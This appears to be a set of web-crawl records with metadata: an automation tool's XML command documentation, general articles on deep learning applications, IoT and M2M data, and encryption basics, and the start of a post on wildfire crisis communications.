- Saves the session data to a variable.
- Write XML Data: Mark the check box to save the data to a file. The data is saved in an XML file encoded in UTF-8 format.
- Execute XPath Function
- Executes an XPath function and stores the results in a variable.
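For readers new to XPath itself, the short Python sketch below (plain ElementTree, not Automation Anywhere code) mirrors what the Get Single Node, Get Multiple Nodes, and Update Nodes operations do against a document; the order data is an invented example.

```python
# Plain-Python illustration of the XPath selections the XML command performs.
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<orders>"
    "<order id='1'><status>open</status></order>"
    "<order id='2'><status>closed</status></order>"
    "</orders>"
)

single = doc.find("./order[@id='1']/status").text        # Get Single Node
many = [o.get("id") for o in doc.findall("./order")]     # Get Multiple Nodes (Loop)
doc.find("./order[@id='1']/status").text = "closed"      # Update Nodes
print(single, many, ET.tostring(doc, encoding="unicode"))
```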
|
<urn:uuid:0d2349a0-72b9-4d1e-8465-f48ad782937c>
|
CC-MAIN-2022-40
|
https://docs.automationanywhere.com/fr-FR/bundle/enterprise-v11.3/page/enterprise/topics/aae-client/bot-creator/commands/xml-command.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00647.warc.gz
|
en
| 0.702494 | 839 | 2.609375 | 3 |
In the broad sense, Artificial Intelligence (AI) refers to the capability of machines to imitate intelligent human behavior. As such, Artificial Intelligence systems process large numbers of observations in order to learn how to confront complex problems. During the last couple of years there has been a surge of interest in Artificial Intelligence problems and applications in a variety of sectors such as transport, healthcare and industry. This interest is largely due to the development and deployment of advanced AI systems that can beat grandmasters at the game of Go or reason over complex driving contexts to enable autonomous vehicles.
The development of such advanced systems has been enabled by the evolution of computing and storage, which facilitates their training on very large datasets and the very fast execution of their algorithms. Most of these advanced systems take advantage of deep learning, a special segment of machine learning that leverages deep neural networks, i.e., neural networks with many hidden layers. Deep neural networks can identify complex and unusual patterns of knowledge, far beyond classical machine learning algorithms. For example, convolutional neural networks (CNNs) can detect and analyze very complex patterns in visual imagery. CNNs are inspired by biological processes, since they connect their neurons in a way similar to the organization of the animal visual cortex. As another example of deep learning techniques, Recurrent Neural Networks (RNNs) are appropriate for analyzing temporal behavior dynamics, since they use their internal state (i.e., their memory) to process entire sequences of different inputs. This makes them more appropriate for artificial intelligence problems like handwriting recognition and speech processing. Overall, deep neural networks tackle some very challenging artificial intelligence problems, i.e., problems that typically require human-like intelligence. The following paragraphs present some of the most popular of these problems.
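As a minimal illustration of the "many hidden layers" idea, the Keras sketch below stacks two convolutional layers in front of a classifier. The layer sizes, input shape and 10-class output are arbitrary example choices, not taken from any system described in this article.

```python
# Minimal CNN sketch: stacked convolutional layers feeding a classifier.
import tensorflow as tf
from tensorflow.keras import layers

model = tf.keras.Sequential([
    layers.Input(shape=(64, 64, 3)),           # a small RGB image
    layers.Conv2D(16, 3, activation="relu"),   # early layers learn local patterns
    layers.MaxPooling2D(),
    layers.Conv2D(32, 3, activation="relu"),   # deeper layers learn complex patterns
    layers.MaxPooling2D(),
    layers.Flatten(),
    layers.Dense(10, activation="softmax"),    # e.g., 10 object classes
])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy")
model.summary()
```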
Image colorization is a challenging artificial intelligence problem: adding colors to black and white (B/W) photographs. This is typically a task undertaken by humans and is the foundation for many interesting projects, like the revival and relaunch of classic B/W films. Deep learning techniques based on convolutional neural networks are nowadays able to deal with the colorization problem. CNNs are efficient at identifying the boundaries of objects in an image. In the colorization case, however, this is not enough: the image must be recreated with color added to the various objects. This is achieved with very large convolutional neural networks with supervised layers, which leverage images and libraries developed over the popular ImageNet database for the problem of automatic colorization.
Another challenging task solved based on deep learning involves sound synthesis for silent videos. The process is based on the development of a deep learning model that associates silent video frames with pre-recorded sounds that match the scenes that are displayed in them. The model takes advantage of a large number of video examples with sounds that comprise scenes similar to the ones contained in the silent video. For example, when the silent video clip depicts an object being hit, the deep learning algorithm produces a sound that is both relevant and realistic enough to fool human viewers. Indeed, similar systems have been evaluated with the participation of human actors, who were unable to determine which video clips comprise real sounds and which ones are synthesized. The system employs a combination of convolutional neural networks and recurrent neural networks, as a means of alleviating the limitations of early stage neural networks.
In addition to "giving life" to silent movies, such deep learning models are expected to open new horizons in media, where they can be used to automatically produce sound effects in movies and TV shows. They will also advance the perceptive capabilities of robots, which will be able to use sound similarity metrics in order to understand an object's context and properties.
There are also many applications that take advantage of multi-media content retrieval (e.g., object search in images) instead of conventional textual search. One of the main tasks in such artificial intelligence problems concerns the classification of objects within a photograph or image based on a set of previously known objects. Very large CNNs have recently proven very efficient in object classification. Likewise, they are also used for a variation of this problem, namely the task of object detection, which is even closer to content-based retrieval. Object detection is foundational for a great number of applications, from security to autonomous cars. It is what we usually see in images where boxes are drawn around a wide array of detected objects.
How about computers and devices that can write like humans? This is no longer science fiction, as there are deep learning solutions that automatically generate handwriting based on a corpus of handwriting samples used for training. In particular, the deep learning solution uses the corpus to learn the relationship between the pen movement and the letters produced by this movement. After this learning phase, the deep learning system is able to generate new handwriting. Note that available systems can be trained to produce different writing styles.
Nowadays most of us have used at least once automatic machine translation systems, which translate words, phrases and sentences from one language to another without any human intervention. Automatic machine translation systems have been around for nearly two decades. However, recent advances in deep learning have significantly improved the effectiveness of automatic translation of text and of automatic translation of images. In particular, modern deep learning models based on very large RNNs can perform text translation without any preprocessing of the word sequence, as they can learn the dependencies between the words and their mapping to a new language. Likewise, CNNs can be used to process images that contain letters. Accordingly, letters are converted to text, the text is translated and new images containing the translated text are recreated. The entire process is much more efficient and accurate than in the past thanks to the availability of large corpora of training data in the target languages. Training data availability is key to success: in most cases it is even more important than having an effective deep learning model or algorithm. Hence, limited training data is usually one of the main limitations of deep learning systems.
The above use cases are probably only the starting point of applying deep learning for artificial intelligence problems based on systems that exhibit human like intelligence. Nevertheless, the presented use cases are indicative of the advanced capabilities offered by deep neural networks. By combining several of the presented capabilities more complex and more interesting use cases will be made possible, such as for example autonomous driving which involves the continuous detection of objects on video in order to understand and anticipate the driving context. Such use cases combine multiple neural networks in order to alleviate the limitations of simple deep learning systems. By and large, when it comes to thinking of the possibilities that are opened up by deep learning, the only limit is the sky.
|
<urn:uuid:a1e59819-5b82-449b-9984-b8d40f54e600>
|
CC-MAIN-2022-40
|
https://www.itexchangeweb.com/blog/deep-learning-and-ai-popular-applications/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00647.warc.gz
|
en
| 0.942264 | 1,632 | 3.703125 | 4 |
The buzz generated by IoT and M2M is understandable, given the dizzying speed with which developments have unfolded and the impact they have had. In a world where digital transformation is influencing most areas of work and life, IoT and M2M have one of the most significant roles to play.
Moreover, IoT and M2M have been powered by the deluge of data that now seems to flow everywhere. This is to be expected, considering that connected devices already outnumber the human population and are set to witness explosive growth over the coming years. This brings us back to the role of data in IoT application development and M2M.
Decoding the Role of Data
Data typically performs the following tasks/functions in an application.
- Generate data
- Collate information
- Analyse the collated information
- Learn from patterns
- Take decisions independently
A device/application typically generates data by sensing and collecting it, analyses it to create a reference, predicts responses from stored patterns, and takes decisions independently with the available inputs.
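A toy sketch of that generate/collate/analyse/decide loop might look like the following; the readings and the 75-degree threshold are made-up example values, not from any real deployment.

```python
# Toy generate -> collate -> analyse -> decide loop; values are invented.
from statistics import mean

readings: list[float] = []   # collated sensor history

def on_new_reading(celsius: float) -> str:
    readings.append(celsius)                       # generate + collate
    baseline = mean(readings)                      # analyse to create a reference
    if celsius > 75 or celsius > baseline * 1.2:   # stored pattern vs. hard limit
        return "shut down machine"                 # decide independently
    return "continue"

for value in (60.2, 61.0, 59.8, 78.4):
    print(value, "->", on_new_reading(value))
```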
The Fundamental Difference between M2M and IoT
M2M and IoT have been used interchangeably to refer to systems that may appear to operate in a similar way. However, there is a fundamental difference between the two, which makes the interchangeable use erroneous.
M2M communications, true to its name, refers to interactions between machines, with operators having access to inputs for re-configuring machines. IoT refers to machines that are connected to the internet and that offer data to customers or clients, which can be used for monitoring purposes and for taking decisions based on the shared information. IoT is more of a development over M2M systems.
Role of Data in the Different Ecosystems of M2M and IoT
M2M is more of a vertical application which meets internal demands, whereas IoT can be considered as one with overarching results or one with open-ended capabilities.
Consequently, the data is different, and its use in IoT application development differs from its use in M2M. The information that moves between machines has evolved considerably and, with its convergence with AI, is bound to offer higher value to users. Data in IoT applications will see greater use of analytics in the future, as developments make it possible for video analytics to empower machines to trigger responses and event-driven actions.
The role of data has grown exponentially, in proportion to the large volumes of data now being exchanged over networks. One of the enablers of this evolved communication is the ability of machines and devices to communicate across different communication standards. This ability to transfer information across different spectrum/connectivity options has reduced latency, which permits real-time actions and responses.
Collation of Data from Virtually Unlimited Numbers of Connected Devices
At present, it is possible for IoT networks to collate data from a virtually unlimited number of connected devices across remote locations. One of the most common and immensely useful examples is GPS-enabled navigation with inputs on traffic congestion. It is hard to imagine getting to a new place without a GPS navigation system that offers data on traffic congestion and re-routes the user along an alternate route.
This makes use of inputs from multiple devices and intelligent analytics of vehicular speed to understand whether the congestion is normal or highly abnormal. Similarly, product usage data is being used effectively to predict requirements and understand customer behavior, boosting sales and triggering actions in supply chains. The applications are growing by the minute as IoT application development gradually spreads to various domains.
Data Used for Industrial Automation in Combination with Other Technologies
IoT is a natural bedfellow with multiple technologies. Consequently, it finds widespread use in combination with other technologies to offer solutions in industry. Industrial automation is one such area, where data flowing through IoT platforms helps unify communication across assembly lines.
The exchange of data between machines and over the internet helps automate processes. Depending on the requirement, assembly lines will either speed up or slow down the processes or change the presentation of products.
The health of machines/assets can be monitored on a real-time basis. For instance, tractors on the field can communicate with the services centers and update technicians about the working condition or efficiency and the need for replacement of parts before the end of the duty cycle. This prevents the need for users to experience downtime as a result of a component failure. This combination has found widespread use to promote preventive maintenance.
Data Exchange for Elder Care Through Wearable Technology
Healthcare has been touted as one of the most significant areas of change that IoT can bring about. Care for the elderly through wearable technology is just one of its many uses. Wearable devices give real-time updates on the health and condition of patients by monitoring vital signs or other parameters to identify a potential risk or early manifestation.
This gives healthcare operations the ability to intervene in the shortest possible time, which provides better outcomes. Remote monitoring of patients' health will change the face of healthcare in developing countries, where a considerable gap exists between specialist medical professionals and facilities, and populations in remote locations.
Connected diagnostics, where devices transmit parameters at predetermined times or when threshold values are crossed, offer hope to patients globally.
IoT and M2M will continue to change the quality of life and the workplace. As organizations take the plunge into operations that are automated, with repetitive tasks being taken over by machines, it will be all the more critical for IoT to work as a grid to connect all aspects seamlessly.
Data will play the single most significant role, effectively communicating crucial information between devices, machines and the internet. Without data, IoT and M2M have no purpose, as the devices are merely a conduit for the data that forms the heart of the solution.
Written by Nasrullah Patel, Co-founder at Peerbits
|
<urn:uuid:e0a298c4-cd64-4acf-ac08-d16eb698dbd3>
|
CC-MAIN-2022-40
|
https://www.iotforall.com/data-in-iot-m2m
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00647.warc.gz
|
en
| 0.939731 | 1,253 | 2.8125 | 3 |
Encryption is a technique employed to keep sensitive and private information safe, such as passwords, identity information and credit card details. As a member of society in the 21st century, you must have accounts on some online platforms or have shopped online at least once in your life. Have you ever wondered how sensitive information like your credit card details and passwords is kept safe on such platforms? The answer is short and straightforward: encryption! In this article, we will take a closer look at what encryption is and how it can be crucial for your organization's cyber security operations.
Simply put, encryption refers to practices that create ciphertexts from plaintexts. Plaintexts are texts that can be read and understood by third parties, whereas ciphertexts are scrambled texts that cannot be understood by third parties even if they somehow manage to get their hands on them. In order to recover the text, you need a cipher, or encryption algorithm, that unscrambles the ciphertext and recreates the plaintext. To the plain eye, encrypted data may seem random or even chaotic. In fact, it is 'scrambled' in a very rule-governed, predictable way.
The intended receiver of the encrypted data can decipher it with the help of a key, an algorithm, a decoder or something similar. If the data and the encryption technique are digital, the intended receiver can use the corresponding decryption tool and acquire the information they need. The thing used for decryption purposes can be called the key, cipher or algorithm. Below you can find detailed information on each.
The term cipher refers to the algorithm that is specifically used for encryption purposes. A cipher consists of a set of successive steps that transform plaintext into ciphertext and, when reversed, turn the ciphertext back into the original information. There are two main kinds of ciphers: stream ciphers and block ciphers.
Algorithms are the procedures that encryption processes follow. There are numerous algorithms used to encrypt and decrypt files and information: Blowfish, Triple DES and RSA are some examples. In addition to algorithms and ciphers, brute force can be used to attempt to decrypt an encrypted text.
There are various techniques employed for encryption. As a result, one can opt for various types of encryption. Below you can find detailed information on these different kinds.
Symmetric encryption: In this kind of encryption, all the communicating parties use the same key for both encryption and decryption.
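A minimal sketch of the symmetric case, using the third-party Python cryptography package; the card number is a dummy test value:

```python
# Symmetric encryption sketch: one shared key both encrypts and decrypts.
from cryptography.fernet import Fernet

shared_key = Fernet.generate_key()   # every communicating party holds this key
cipher = Fernet(shared_key)

ciphertext = cipher.encrypt(b"card number 4111 1111 1111 1111")
assert cipher.decrypt(ciphertext) == b"card number 4111 1111 1111 1111"
```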
Asymmetric encryption: In this kind of encryption, two different keys are used, one for encryption and the other for decryption. One of these keys is shared publicly while the other is kept private. That is why asymmetric encryption is also known as public key encryption. This kind of encryption is also of pivotal importance for SSL/TLS.
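And a matching sketch of the asymmetric case, again with the cryptography package: anyone may encrypt with the public key, but only the private key holder can decrypt.

```python
# Asymmetric (public key) encryption sketch using RSA with OAEP padding.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()   # safe to publish

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

ciphertext = public_key.encrypt(b"a secret password", oaep)
assert private_key.decrypt(ciphertext, oaep) == b"a secret password"
```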
|
<urn:uuid:ce2ac08d-4c21-4667-a495-a0bb126e7a99>
|
CC-MAIN-2022-40
|
https://www.logsign.com/blog/what-is-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00647.warc.gz
|
en
| 0.949276 | 607 | 3.671875 | 4 |
Recently, the French Data Protection Authority (“CNIL”) published its initial assessment of the compatibility of blockchain technology with the EU General Data Protection Regulation (GDPR) and proposed concrete solutions for organizations wishing to use blockchain technology when implementing data processing activities.
What is a Blockchain?: A blockchain is a database in which data is stored and distributed over a large number of computers and in which all entries (called "transactions") are visible to all users of the blockchain. It is a technology that can be used to process personal data and is not a processing activity in itself.
Scope of the CNIL’s Assessment
The CNIL made it clear that its assessment does not apply to (1) distributed ledger technology (DLT) solutions and (2) private blockchains.
- DLT solutions are not blockchains and are too recent and rare to allow the CNIL to carry out a generic analysis.
- Private blockchains are defined by the CNIL as blockchains under the control of a party that has sole control over who can join the network and who can participate in the consensus process of the blockchain (i.e., the process for determining which blocks get added to the chain and what the current state is). These private blockchains are simply classic distributed databases. They do not raise specific GDPR compliance issues, unlike public blockchains (i.e., blockchains that anyone in the world can read or send transactions to, and expect to see included if valid, and anyone in the world can participate in the consensus process) and consortium blockchains (i.e., blockchains subject to rules that define who can participate in the consensus process or even conduct transactions).
In its assessment, the CNIL first examined the role of the actors in a blockchain network as a data controller or data processor. The CNIL then issued recommendations to minimize privacy risks to individuals (data subjects) when their personal data is processed using blockchain technology. In addition, the CNIL examined solutions to enable data subjects to exercise their data protection rights. Lastly, the CNIL discussed the security requirements that apply to blockchain.
Role of Actors in a Blockchain Network
The CNIL made a distinction between the participants who have permission to write on the chain (called "participants") and those who validate a transaction and create blocks by applying the blockchain's rules so that the blocks are "accepted" by the community (called "miners"). According to the CNIL, the participants, who decide to submit data for validation by miners, act as data controllers when (1) the participant is an individual and the data processing is not purely personal but is linked to a professional or commercial activity; and (2) the participant is a legal person and enters data into the blockchain.
If a group of participants decides to implement a processing activity on a blockchain for a common purpose, the participants should identify the data controller upstream, e.g., by (1) creating an entity and appointing that entity as the data controller, or (2) appointing the participant who takes the decisions for the group as the data controller. Otherwise, they could all be considered as joint data controllers.
According to the CNIL, data processors within the meaning of the GDPR may be (1) smart contract developers who process personal data on behalf of the participant – the data controller, or (2) miners who validate the recording of the personal data in the blockchain. The qualification of miners as data processors may raise practical difficulties in the context of public blockchains, since that qualification requires miners to execute with the data controller a contract that contains all the elements provided for in Article 28 of the GDPR. The CNIL announced that it was currently conducting an in-depth reflection on this issue. In the meantime, the CNIL encouraged actors to use innovative solutions enabling them to ensure compliance with the obligations imposed on the data processor by the GDPR.
How to Minimize Risks To Data Subjects
- Assessing the appropriateness of using blockchain
As part of the Privacy by Design requirements under the GDPR, data controllers must consider in advance whether blockchain technology is appropriate to implement their data processing activities. Blockchain technology is not necessarily the most appropriate technology for all processing of personal data, and may cause difficulties for the data controller to ensure compliance with the GDPR, and in particular, its cross-border data transfer restrictions. In the CNIL’s view, if the blockchain’s properties are not necessary to achieve the purpose of the processing, data controllers should give priority to other solutions that allow full compliance with the GDPR.
If it is appropriate to use blockchain technology, data controllers should use a consortium blockchain that ensures better control of the governance of personal data, in particular with respect to data transfers outside of the EU. According to the CNIL, the existing data transfer mechanisms (such as Binding Corporate Rules or Standard Contractual Clauses) are fully applicable to consortium blockchains and may be implemented easily in that context, while it is more difficult to use these data transfer mechanisms in a public blockchain.
- Choosing the right format under which the data will be recorded
As part of the data minimization requirement under the GDPR, data controllers must ensure that the data is adequate, relevant and limited to what is necessary in relation to the purposes for which the data is processed.
In this respect, the CNIL recalled that the blockchain may contain two main categories of personal data, namely (1) the credentials of participants and miners and (2) additional data entered into a transaction (e.g., diploma, ownership title, etc.) that may relate to individuals other than the participants and miners.
The CNIL noted that it was not possible to further minimize the credentials of participants and miners since such credentials are essential to the proper functioning of the blockchain. According to the CNIL, the retention period of this data must necessarily correspond to the lifetime of the blockchain.
With respect to additional data, the CNIL recommended using solutions in which (1) data in cleartext form is stored outside of the blockchain and (2) only information proving the existence of the data is stored on the blockchain (i.e., cryptographic commitment, fingerprint of the data obtained by using a keyed hash function, etc.).
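A minimal sketch of that recommendation: the record stays off-chain and only a keyed fingerprint (here an HMAC) is written to the chain. The record contents and key handling are invented for illustration; they are not CNIL-prescribed code.

```python
# Sketch: personal data stays off-chain; only a keyed fingerprint is recorded
# on-chain. Destroying the key later makes the on-chain trace practically unusable.
import hashlib, hmac, secrets

secret_key = secrets.token_bytes(32)         # held off-chain by the controller
record = b"diploma: Jane Doe, MSc, 2018"     # stored off-chain

fingerprint = hmac.new(secret_key, record, hashlib.sha256).hexdigest()
# -> only `fingerprint` is written into the blockchain transaction

# Existence of the record can later be proven by recomputing the fingerprint:
recomputed = hmac.new(secret_key, record, hashlib.sha256).hexdigest()
assert hmac.compare_digest(fingerprint, recomputed)
```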
In situations in which none of these solutions can be implemented, and when this is justified by the purpose of the processing and the data protection impact assessment revealed that residual risks are acceptable, the data could be stored either with a non-keyed hash function or, in the absence of alternatives, “in the clear.”
How to Ensure that Data Subjects Can Effectively Exercise Their Data Protection Rights
According to the CNIL, the exercise of the right to information, the right of access and the right to data portability does not raise any particular difficulties in the context of blockchain technology (i.e., data controllers may provide notice of the data processing and may respond to data subjects’ requests of access to their personal data or data portability requests.)
However, the CNIL recognized that it is technically impossible for data controllers to meet data subjects’ requests for erasure of their personal data when the data is entered into the blockchain: once in the blockchain system, the data can no longer be rectified or erased.
In this respect, the CNIL pointed out that technical solutions exist to move towards compliance with the GDPR. This is the case if the data is stored on the blockchain using a cryptographic method (see above). In this case, the deletion of (1) the data stored outside of the blockchain and (2) the verification elements stored on the blockchain, would render the data almost inaccessible.
With respect to the right to rectification of personal data, the CNIL recommended that the data controller enter the updated data into a new block since a subsequent transaction may cancel the first transaction, even if the first transaction will still appear in the chain. The same solutions as those applicable to requests for erasure could be applied to inaccurate data if that data must be erased.
The CNIL considered that the security requirements under the GDPR remain fully applicable in the blockchain.
In the CNIL’s view, the challenges posed by blockchain technology call for a response at the European level. The CNIL announced that it will cooperate with other EU supervisory authorities to propose a robust and harmonized approach to blockchain technology.
Blog courtesy of Hunton Andrews Kurth, a U.S.-based law firm with a Global Privacy and Cybersecurity practice that’s known throughout the world for its deep experience, breadth of knowledge and outstanding client service. Read the company’s privacy blog here.
|
<urn:uuid:fc966d4e-5f2c-4c31-92b5-0e4daf8c527f>
|
CC-MAIN-2022-40
|
https://www.msspalert.com/cybersecurity-markets/emea/blockchain-and-gdpr-compliance-a-closer-look/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00647.warc.gz
|
en
| 0.910468 | 1,789 | 2.625 | 3 |
The past month has seen one blockbuster revelation after another about how our mobile phone and broadband providers have been leaking highly sensitive customer information, including real-time location data and customer account details. In the wake of these consumer privacy debacles, many are left wondering who’s responsible for policing these industries? How exactly did we get to this point? What prospects are there for changes to address this national privacy crisis at the legislative and regulatory levels? These are some of the questions we’ll explore in this article.
Lawmakers in the U.S. Senate today introduced a bill that would set baseline security standards for the government’s purchase and use of a broad range of Internet-connected devices, including computers, routers and security cameras. The legislation, which also seeks to remedy some widely-perceived shortcomings in existing cybercrime law, was developed in direct response to a series of massive cyber attacks in 2016 that were fueled for the most part by poorly-secured “Internet of Things” (IoT) devices.
The U.S. Senate is preparing to vote on cybersecurity legislation that proponents say is sorely needed to better help companies and the government share information about the latest Internet threats. Critics of the bill and its many proposed amendments charge that it will do little, if anything, to address the very real problem of flawed cybersecurity while creating conditions that are ripe for privacy abuses. What follows is a breakdown of the arguments on both sides, and a personal analysis that seeks to add some important context to the debate.
Lost in the ongoing media firestorm over the National Security Agency’s domestic surveillance activities is the discussion about concrete steps to bring the nation’s communications privacy laws into the 21st Century. Under current laws that were drafted before the advent of the commercial Internet, federal and local authorities can gain access to mobile phone and many email records without a court-issued warrant. In this post, I’ll explain what federal lawmakers and readers can do to help change the status quo.
Internet regulators are pushing a controversial plan to restrict public access to WHOIS Web site registration records. Proponents of the proposal say it would improve the accuracy of WHOIS data and better protect the privacy of people who register domain names. Critics argue that such a shift would be unworkable and make it more difficult to combat phishers, spammers and scammers.
|
<urn:uuid:d7389d37-e68f-4fe1-afa5-513c8e18808c>
|
CC-MAIN-2022-40
|
https://krebsonsecurity.com/tag/cdt/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00047.warc.gz
|
en
| 0.943755 | 542 | 2.53125 | 3 |
Checks path names.
The pathchk command checks that one or more path names are valid and portable. By default, the pathchk command checks each component of each path name specified by the pathname parameter based on the underlying file system. An error message is sent for each path name that meets the following criteria:
- The byte length of the full path name is longer than allowed by the system.
- The byte length of a component is longer than allowed by the system.
- Search permission is not allowed for a component.
- A character in any component is not valid in its containing directory.
It is not an error if one or more components of a path name do not exist, provided a file matching the path name specified by the pathname parameter could be created without violating any of the above criteria.
More extensive portability checks are run when the -p or -P flag is specified.
|-p||Checks the path name based on POSIX portability standards. An error message is sent for each path name that meets the following criteria: the byte length of the full path name exceeds the POSIX minimum limit; the byte length of a component exceeds the POSIX minimum limit; or a component contains a character that is not in the portable file name character set.|
|-P||Checks the pathname operand and returns an error message if the pathname operand is empty or contains a component that begins with a hyphen (-).|
This command returns the following exit values:
|0||All pathname operands passed all of the checks.|
|>0||An error occurred.|
- To check the validity and portability of the /home/bob/work/tempfiles path name on your system, enter:
pathchk /home/bob/work/tempfiles
- To check the validity and portability of the /home/bob/temp path name for POSIX standards, enter:
pathchk -p /home/bob/temp
|/usr/bin/pathchk||Contains the pathchk command.|
|
<urn:uuid:aa4487c3-5005-4e4a-8477-f9e42d02810b>
|
CC-MAIN-2022-40
|
https://www.ibm.com/docs/en/aix/7.1?topic=p-pathchk-command
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00047.warc.gz
|
en
| 0.668303 | 439 | 2.515625 | 3 |
DARPA Fully Homomorphic Encryption (FHE)
Protecting and preserving personally identifiable information (PII), intellectual property, intelligence insights, and other forms of sensitive information has never been more critical. A steady cadence of data breaches and attacks are reported seemingly daily. As the use of cloud computing and virtual networks becomes increasingly pervasive for storing, processing, and moving information, concerns around data vulnerability, access, and privacy are similarly on the rise.
“Today, we are seeing ongoing struggles to trust the technologies and standards in place that are designed to protect critical data,” said DARPA program manager, Tom Rondeau. “Advances in quantum computing are raising questions about the durability of some of the most advanced data protection technologies, while concerns are being raised about the collection, misuse, and handling of personal information by organizations and institutions. These challenges underscore an urgent need to explore new secure computing models that can mitigate risk whether data is at-rest, in-transit, or in use.”
Fully Homomorphic Encryption (FHE) is an approach to data security that delivers mathematical proof of encryption by using cryptographic means, providing a new level of certainty around how data is stored and manipulated. Today, traditional encryption protects data while stored or in transmission, but the information must be decrypted to perform a computation, analyze it, or employ it to train a machine learning model. Decryption endangers the data, exposing it to compromise by savvy adversaries or even accidental leaks. FHE enables computation on encrypted information, allowing users to strike a balance between using sensitive data to its full extent and removing the risk of exposure. While FHE is increasingly touted as a viable path forward, it requires a prohibitive amount of compute power and time.
"A computation that would take a millisecond to complete on a standard laptop would take weeks to compute on a conventional server running FHE today," noted Rondeau.
To reduce the processing time from weeks to seconds – even milliseconds – DARPA launched the Data Protection in Virtual Environments (DPRIVE) program. DPRIVE seeks to develop a hardware accelerator for FHE computations that will dramatically reduce the compute runtime overhead compared to software-based FHE approaches. The goal of the program is to design and implement a hardware accelerator for FHE computations that is capable of drastically speeding up FHE calculations, making the technology more accessible for sensitive defense applications as well as commercial use.
The safety and security of critical information – whether it is sensitive intellectual property (IP), financial information, personally identifiable information (PII), intelligence insight, or beyond – is of vital importance. Conventional data encryption methods or cryptographic solutions, such as the Advanced Encryption Standard (AES), translate data into a secret "code" that can only be decoded by people with access to a decryption key. These methods protect data as it is transmitted across a network or at rest in storage. Processing or computing on this data, however, requires that it first be decrypted, exposing it to numerous vulnerabilities and threats. Fully homomorphic encryption (FHE) offers a solution to this challenge. FHE enables computation on encrypted data, or ciphertext, rather than plaintext (unencrypted data), essentially keeping data protected at all times. The benefits of FHE are significant, from enabling the use of untrusted networks to enhancing data privacy. Despite its potential, FHE requires enormous computation time to perform even simple operations, making it exceedingly impractical to implement with traditional processing hardware.
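To see what "computing on ciphertext" means in the simplest possible terms, the toy sketch below implements textbook Paillier encryption, which is only additively homomorphic and here uses laughably small primes. Real FHE schemes support arbitrary computations and, as described next, rely on lattice cryptography; but the core idea, a server adding numbers it cannot read, is the same.

```python
# Toy, insecure Paillier demo: multiplying ciphertexts adds the hidden plaintexts.
import random
from math import gcd

p, q = 1009, 1013                 # demo-only primes; real keys are 2048+ bits
n, n2 = p * q, (p * q) ** 2
lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)   # lcm(p-1, q-1)
mu = pow(lam, -1, n)              # valid because the generator is g = n + 1

def encrypt(m: int) -> int:
    r = random.randrange(1, n)
    while gcd(r, n) != 1:         # r must be invertible mod n
        r = random.randrange(1, n)
    return (pow(n + 1, m, n2) * pow(r, n, n2)) % n2

def decrypt(c: int) -> int:
    return ((pow(c, lam, n2) - 1) // n * mu) % n

c = (encrypt(20) * encrypt(22)) % n2   # computed without ever seeing 20 or 22
assert decrypt(c) == 42
```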
FHE relies on a particular type of cryptography called lattice cryptography, which presents complex mathematical challenges to would-be attackers that require technologies beyond the current state of the art to solve. While effective at keeping data protected, the challenge with modern lattice-based FHE is the unavoidable accumulation of noise with each calculation performed. With each homomorphic computation, a certain amount of noise – or error – is generated that corrupts the encrypted data representation. Once this noise accumulation reaches a certain point, it becomes impossible to recover the original underlying plaintext. Essentially, the data in need of protection is now lost. Computational structures called “bootstrapping” help address this untenable noise accumulation, reducing it to a level that is comparable to the original plaintext, but produces massive compute overhead to perform.
“While a number of solutions have been developed, running FHE in software on standard processing hardware remains a nearly impossible challenge,” said DARPA program manager, Dr. Tom Rondeau. “Under previous programs like the Programming Computation on Encrypted Data (PROCEED) program, DARPA helped uncover FHE algorithms and proved what could be possible with FHE running on standard CPUs. It also shed light on the compute penalty and critical limitations of the technology. Today, DARPA is continuing to invest in the exploration of FHE, focusing on a re-architecting of the hardware, software, and algorithms needed to make it a practical, widely usable solution.”
DARPA developed the Data Protection in Virtual Environments (DPRIVE) program to design and implement a hardware accelerator for FHE computations that aims to significantly reduce the current computational burden to drastically speed up FHE calculations. DPRIVE specifically seeks to reduce the computational run time overhead by many orders of magnitude compared to current software-based FHE computations on conventional CPUs, and accelerate FHE calculations to within one order of magnitude of current performance on unencrypted data.
More details on the design and high level architecture of the new generation Fully Homomorphic Encryption can be found in the following resources:
|
<urn:uuid:b4ad97c7-0439-43f1-8a4a-05e0962999ad>
|
CC-MAIN-2022-40
|
https://stefanos.cloud/blog/darpa-research-on-next-generation-fully-homomorphic-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00047.warc.gz
|
en
| 0.898971 | 1,158 | 3.046875 | 3 |
Trial By Fire: What Wildfire Response Teaches Us About Crisis Communications
Wildfire outbreaks cause panic and disruption as flames burning in dry grasslands and forests move into nearby communities, displacing people, their pets, and the natural wildlife.
In the United States, a recent fire (still burning at the time of this post and 87% contained) north of Los Angeles shut down a stretch of Interstate 5 — a major artery that runs from Mexico to Canada. The blaze led to urgent tweets about mandatory evacuations that included an elementary school too close to the flames.
Things like this are not just happening in California. Wildfires are also burning in places like Spain, Canada, and France where each government is declaring a state of emergency.
As a retired police commander who worked closely with colleagues in the fire and ambulance services, my thoughts go out to the emergency responders who are dealing with the fires head-on, and also to those communities that are affected.
